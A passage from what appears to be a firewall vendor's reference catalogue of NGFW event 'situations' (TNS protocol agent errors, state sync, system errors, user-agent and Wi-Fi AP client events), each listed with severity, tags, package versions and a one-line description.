Last changed: sgpkg-ips-218-3038
Description: HOST block not found from TNS message.
Back to top

FW_Protocol-Agent-Illegal-Behaviour-Of-A-Client-Or-Server

About this situation: Illegal behaviour of a client or server
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Illegal behaviour of a client or server.
Back to top

FW_Protocol-Agent-Incompatible-Version-Of-A-Connection-State

About this situation: Incompatible version of a connection state
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Incompatible version of a connection state.
Back to top

FW_Protocol-Agent-Invalid-Properties-Of-Custom-Protocol-Agent

About this situation: Invalid properties of custom Protocol Agent
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Invalid properties of custom Protocol Agent.
Back to top

FW_Protocol-Agent-Invalid-Sun-RPC-Portmapper-Message

About this situation: Invalid Sun RPC Portmapper message
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Invalid Sun RPC Portmapper message.
Back to top

FW_Protocol-Agent-IP-In-TNS-Message-Changed

About this situation: IP in TNS message changed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IP in TNS message changed.
Back to top

FW_Protocol-Agent-NAT-Rule-Matching-To-Related-Connection-Is-Unsuitable

About this situation: NAT rule matching to related connection is unsuitable
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: NAT rule matching to related connection is unsuitable.
Back to top

FW_Protocol-Agent-No-NAT-Rule-Matching-To-Related-Connection

About this situation: No NAT rule matching to related connection
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: No NAT rule matching to related connection.
Back to top

FW_Protocol-Agent-PA-Connection-State-Invalid

About this situation: PA connection state invalid
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: PA connection state invalid.
Back to top

FW_Protocol-Agent-PA-State-Synchronization-Error

About this situation: PA state synchronization error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: PA state synchronization error.
Back to top

FW_Protocol-Agent-PORT-Block-Not-Found-From-TNS-Message

About this situation: PORT block not found from TNS message
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: PORT block not found from TNS message.
Back to top

FW_Protocol-Agent-Port-In-TNS-Message-Changed

About this situation: Port in TNS message changed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Port in TNS message changed.
Back to top

FW_Protocol-Agent-Proxy-Server-Registration-Error

About this situation: Proxy Server registration error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Proxy Server registration error.
Back to top

FW_Protocol-Agent-Server-IP-From-Oracle-Listener-Is-Not-Allowed

About this situation: Server IP from Oracle Listener is not allowed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Server IP from Oracle Listener is not allowed.
Back to top

FW_Protocol-Agent-Sun-RPC-Portmapper-Reply-Without-Corresponding-Call-Detected

About this situation: Sun RPC Portmapper reply without corresponding call detected
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Sun RPC Portmapper reply without corresponding call detected.
Back to top

FW_Protocol-Agent-TNS-Header-Checksum-Changed-To-0

About this situation: TNS header checksum changed to 0
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: TNS header checksum changed to 0.
Back to top

FW_Protocol-Agent-TNS-Packet-Checksum-Changed-To-0

About this situation: TNS packet checksum changed to 0
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: TNS packet checksum changed to 0.
Back to top

FW_Protocol-Agent-TNS-Packet-From-A-Wrong-Direction

About this situation: TNS packet from a wrong direction
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: TNS packet from a wrong direction.
Back to top

FW_Protocol-Agent-TNS-Packet-Too-Long

About this situation: TNS packet too long
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: TNS packet too long.
Back to top

FW_Protocol-Agent-TNS-Packet-Too-Short

About this situation: TNS packet too short
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: TNS packet too short.
Back to top

FW_Protocol-Agent-TNS-Request-Too-Long

About this situation: TNS request too long
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: TNS request too long.
Back to top

FW_Protocol-Agent-TNS-Request-Too-Short

About this situation: TNS request too short
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: TNS request too short.
Back to top

FW_Protocol-Agent-TNS-Response-Too-Long

About this situation: TNS response too long
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: TNS response too long.
Back to top

FW_Protocol-Agent-TNS-Response-Too-Short

About this situation: TNS response too short
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: TNS response too short.
Back to top

FW_Protocol-Agent-Too-Many-Logical-Channels

About this situation: Too many logical channels
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Too many logical channels.
Back to top

FW_Protocol-Agent-Transport-Protocol-Violation

About this situation: Transport protocol violation
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Transport protocol violation.
Back to top

FW_Protocol-Agent-Unkonwn-TNS-Packet-Type

About this situation: Unkonwn TNS packet type
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Unkonwn TNS packet type.
Back to top

FW_Protocol-Agent-Unrecognized-Protocol

About this situation: Unrecognized protocol
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Unrecognized protocol.
Back to top

FW_Protocol-Agent-Unsupported-Client-Or-Server-Application

About this situation: Unsupported client or server application
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Unsupported client or server application.
Back to top

FW_Protocol-Agent-Unsupported-Client-Or-Server-Version

About this situation: Unsupported client or server version
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Unsupported client or server version.
Back to top

FW_Protocol-Agent-Unsupported-Protocol-Property

About this situation: Unsupported protocol property
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Unsupported protocol property.
Back to top

FW_Protocol-Agent-Unsupported-Version-Of-Sun-RPC-Portmapper-Call

About this situation: Unsupported version of Sun RPC Portmapper call
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Unsupported version of Sun RPC Portmapper call.
Back to top

FW_Reject-Web-Portal-SSL-VPN-Connection

About this situation: SSL VPN Web portal user authentication rejected
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN Web portal user authentication rejected
Back to top

FW_Rejected-IKE-Message

About this situation: Rejected IKE message
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Rejected IKE message.
Back to top

FW_Related-Connection

About this situation: Related connection
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Related connection.
Back to top

FW_Related-Packet

About this situation: Related packet
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Related packet.
Back to top

FW_Server-Pool-Message-From-Server-Pool-Member

About this situation: Message from server pool member
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Message from server pool member.
Back to top

FW_Server-Pool-Server-Pool-Member-Went-Offline

About this situation: Server pool member went offline
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Server pool member went offline.
Back to top

FW_Server-Pool-Server-Pool-Member-Went-Online

About this situation: Server pool member went online
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Server pool member went online.
Back to top

FW_Starting-Hybrid-Authentication

About this situation: Starting hybrid authentication
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Starting hybrid authentication.
Back to top

FW_Synchronization-Receiving-Sync-Messages

About this situation: Receiving sync messages
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Receiving sync messages.
Back to top

FW_Synchronization-Sending-Sync-Messages

About this situation: Sending sync messages
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Sending sync messages.
Back to top

FW_Synchronization-State-Sync-Communication-Discard-Incremental-Tuple

About this situation: State sync tuple discard incrmental tuple
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-353-4219
Description: Tuple information of a discarded tuple from state sync message
Back to top

FW_Synchronization-State-Sync-Communication-Drop-Tuple

About this situation: State sync tuple drop tuple
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-352-4219
Last changed: sgpkg-ips-352-4219
Description: Tuple dropped after load balancing change
Back to top

FW_Synchronization-State-Sync-Communication-Failure

About this situation: State sync communication failure
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync communication failure.
Back to top

FW_Synchronization-State-Sync-Communication-Install-Incremental-Tuple

About this situation: State sync tuple receive incrmental tuple
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-353-4219
Description: Tuple information of a installed tuple from state sync message
Back to top

FW_Synchronization-State-Sync-Communication-Install-Tuple

About this situation: State sync tuple installation
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-352-4219
Last changed: sgpkg-ips-352-4219
Description: Tuple installed after load balancing change
Back to top

FW_Synchronization-State-Sync-Communication-Receive-Incremental-Tuple

About this situation: State sync tuple receive incremental tuple
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-353-4219
Description: Tuple information of a received tuple from state sync message
Back to top

FW_Synchronization-State-Sync-Communication-Receive-Tuple

About this situation: State sync tuple receive tuple
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-352-4219
Last changed: sgpkg-ips-352-4219
Description: Tuple information in received full state sync message
Back to top

FW_Synchronization-State-Sync-Communication-Send-Incremental-Tuple

About this situation: State sync send incremental tuple
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-353-4219
Description: Tuple information in a sent incremental state sync message
Back to top

FW_Synchronization-State-Sync-Communication-Send-Tuple

About this situation: State sync tuple send tuple
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-352-4219
Last changed: sgpkg-ips-352-4219
Description: Tuple information in full state sync message
Back to top

FW_Synchronization-State-Sync-Configuration-Changed

About this situation: State sync configuration changed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync configuration changed.
Back to top

FW_Synchronization-State-Sync-Failed-To-Allocate-Resource

About this situation: State sync failed to allocate resource
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync failed to allocate resource.
Back to top

FW_Synchronization-State-Sync-Failed-To-Initialize

About this situation: State sync failed to initialize
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync failed to initialize.
Back to top

FW_Synchronization-State-Sync-Failed-To-Initialize-Kernel-Interface

About this situation: State sync failed to initialize kernel interface
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync failed to initialize kernel interface.
Back to top

FW_Synchronization-State-Sync-Failed-To-Receive

About this situation: State sync failed to receive
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync failed to receive.
Back to top

FW_Synchronization-State-Sync-Failed-To-Reinitialize

About this situation: State sync failed to reinitialize
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync failed to reinitialize.
Back to top

FW_Synchronization-State-Sync-Failed-To-Send-Sync-Message

About this situation: State sync failed to send sync message
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync failed to send sync message.
Back to top

FW_Synchronization-State-Sync-Failed-To-Set-Configuration

About this situation: State sync failed to set configuration
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync failed to set configuration.
Back to top

FW_Synchronization-State-Sync-Internal-Communication-Error

About this situation: State sync internal communication error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync internal communication error.
Back to top

FW_Synchronization-State-Sync-Invalid-Command

About this situation: State sync invalid command
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync invalid command.
Back to top

FW_Synchronization-State-Sync-Kernel-Event

About this situation: State sync kernel event
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync kernel event.
Back to top

FW_Synchronization-State-Sync-Key-Changed

About this situation: State sync key changed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync key changed.
Back to top

FW_Synchronization-State-Sync-Key-Management-Failure

About this situation: State sync key management failure
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: State sync key management failure.
Back to top

FW_System-Authentication-Error

About this situation: Authentication error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Authentication error.
Back to top

FW_System-Communication-Failure

About this situation: Communication failure
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Communication failure.
Back to top

FW_System-Configuration-Changed

About this situation: Configuration changed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Configuration changed.
Back to top

FW_System-Connection-Refused

About this situation: Connection refused
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Connection refused.
Back to top

FW_System-Data-Corrupted

About this situation: Data corrupted
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Data corrupted.
Back to top

FW_System-Device-Or-Resource-Busy

About this situation: Device or resource busy
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Device or resource busy.
Back to top

FW_System-Failed-To-Allocate-Resource

About this situation: Failed to allocate resource
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Failed to allocate resource.
Back to top

FW_System-Failed-To-Execute-A-Command

About this situation: Failed to execute a command
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Failed to execute a command.
Back to top

FW_System-Failed-To-Initialize

About this situation: Failed to initialize
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Failed to initialize.
Back to top

FW_System-Failed-To-Initialize-Kernel-Interface

About this situation: Failed to initialize kernel interface
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Failed to initialize kernel interface.
Back to top

FW_System-Failed-To-Receive

About this situation: Failed to receive
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Failed to receive.
Back to top

FW_System-Failed-To-Reinitialize

About this situation: Failed to reinitialize
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Failed to reinitialize.
Back to top

FW_System-Failed-To-Send

About this situation: Failed to send
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Failed to send.
Back to top

FW_System-Failed-To-Send-Command-To-Kernel

About this situation: Failed to send command to kernel
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Failed to send command to kernel.
Back to top

FW_System-Failed-To-Set-Configuration

About this situation: Failed to set configuration
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Failed to set configuration.
Back to top

FW_System-File-Not-Found

About this situation: File not found
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: File not found.
Back to top

FW_System-Incorrect-Address

About this situation: Incorrect address
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Incorrect address.
Back to top

FW_System-Invalid-Argument

About this situation: Invalid argument
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Invalid argument.
Back to top

FW_System-Invalid-Checksum

About this situation: Invalid checksum
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Invalid checksum.
Back to top

FW_System-Invalid-Command

About this situation: Invalid command
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Invalid command.
Back to top

FW_System-Invalid-Configuration

About this situation: Invalid configuration
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Invalid configuration.
Back to top

FW_System-Invalid-Options

About this situation: Invalid options
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Invalid options.
Back to top

FW_System-Invalid-Packet

About this situation: Invalid packet
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Invalid packet.
Back to top

FW_System-IO-Error

About this situation: IO error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IO error.
Back to top

FW_System-Key-Exchange

About this situation: Key exchange
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Key exchange.
Back to top

FW_System-Key-Management-Failure

About this situation: Key management failure
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Key management failure.
Back to top

FW_System-Load-Balancing

About this situation: Load balancing
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Load balancing.
Back to top

FW_System-Memory-Allocation-Failed

About this situation: Memory allocation failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Memory allocation failed.
Back to top

FW_System-Network-Is-Unreachable

About this situation: Network is unreachable
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Network is unreachable.
Back to top

FW_System-No-Buffer-Space-Available

About this situation: No buffer space available
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: No buffer space available.
Back to top

FW_System-No-Response

About this situation: No response
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: No response.
Back to top

FW_System-No-Route-To-Host

About this situation: No route to host
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: No route to host.
Back to top

FW_System-No-Space-Left-On-Device

About this situation: No space left on device
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: No space left on device.
Back to top

FW_System-No-Such-Device-Found

About this situation: No such device found
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: No such device found.
Back to top

FW_System-Node-Booted

About this situation: Node booted
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Node booted.
Back to top

FW_System-Node-Down

About this situation: Node down
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Node down.
Back to top

FW_System-Node-Up

About this situation: Node up
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Node up.
Back to top

FW_System-Operation-Not-Supported

About this situation: Operation not supported
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Operation not supported.
Back to top

FW_System-Packet-Too-Long

About this situation: Packet too long
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Packet too long.
Back to top

FW_System-Packet-Too-Short

About this situation: Packet too short
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Packet too short.
Back to top

FW_System-Permission-Denied

About this situation: Permission denied
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Permission denied.
Back to top

FW_System-Protocol-Not-Supported

About this situation: Protocol not supported
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Protocol not supported.
Back to top

FW_System-Queue-Is-Full

About this situation: Queue is full
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Queue is full.
Back to top

FW_System-Security-Policy-Reload

About this situation: Security policy reload
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Security policy reload.
Back to top

FW_System-Timeout

About this situation: Timeout
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Timeout.
Back to top

FW_UA-Agent-failover

About this situation: Agent failover
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: Agent failover
Back to top

FW_UA-User-disconnected

About this situation: FW could not connect to the User Agent
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: FW could not connect to the User Agent
Back to top

FW_UA-User-logoff

About this situation: User has been successfully unauthorized via User Agent
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: User has been successfully unauthorized via User Agent
Back to top

FW_UA-User-logon

About this situation: User has been successfully authorized via User Agent
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: User has been successfully authorized via User Agent
Back to top

FW_WIFI_AP-Client-authentication-failed

About this situation: Client authentication failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Wireless client has not been authenticated to access point.
Back to top

FW_WIFI_AP-Client-authentication-success

About this situation: Client authentication success
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Wireless client has successfully authenticated to access point.
Back to top

FW_WIFI_AP-Client-authorization-failed

About this situation: Client authorization failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-565-5211
Description: Wireless client has not been authorized to access point.
Back to top

FW_WIFI_AP-Client-authorization-success

About this situation: Client authorization succeeded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-565-5211
Description: Wireless client has been authorized to access point.
Back to top

FW_WIFI_AP-Client-deauthenticated

About this situation: Client deauthenticated on wireless access point
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Wireless client has been deauthenticated on access point.
Back to top

FW_WIFI_AP-Client-deauthorized

About this situation: Client deauthorized
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-565-5211
Description: Wireless client has been deauthorized from access point.
Back to top

FW_WIFI_AP-Client-disassiociated

About this situation: Client disassociation from wireless access point
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Wireless client has been disassociated from access point.
Back to top

FW_WIFI_AP-Client-MAC-address-blocked

About this situation: Client is on blocked MAC address list
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Client's MAC address is blocked.
Back to top

FW_WIFI_AP-Client-MAC-address-not-allowed

About this situation: Client is not on allowed MAC address list
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Client's MAC address is not allowed.
Back to top

FW_WIFI_AP-Client-successfully-associated

About this situation: Client successfully associated to access point
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Wireless client has been successfully associated to access point.
Back to top

FW_WIFI_AP-DFS-scan-ready

About this situation: DFS channel scanning is finished
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-746-5211
Last changed: sgpkg-ips-1531-5242
Description: Wireless AP DFS channel scanning is finished.
Back to top

FW_WIFI_AP-DFS-scan-still-running

About this situation: DFS channel scanning is still running
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-746-5211
Last changed: sgpkg-ips-1531-5242
Description: Wireless AP is in the process of DFS channel scanning.
Back to top

G-Cloud

About this situation: G Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
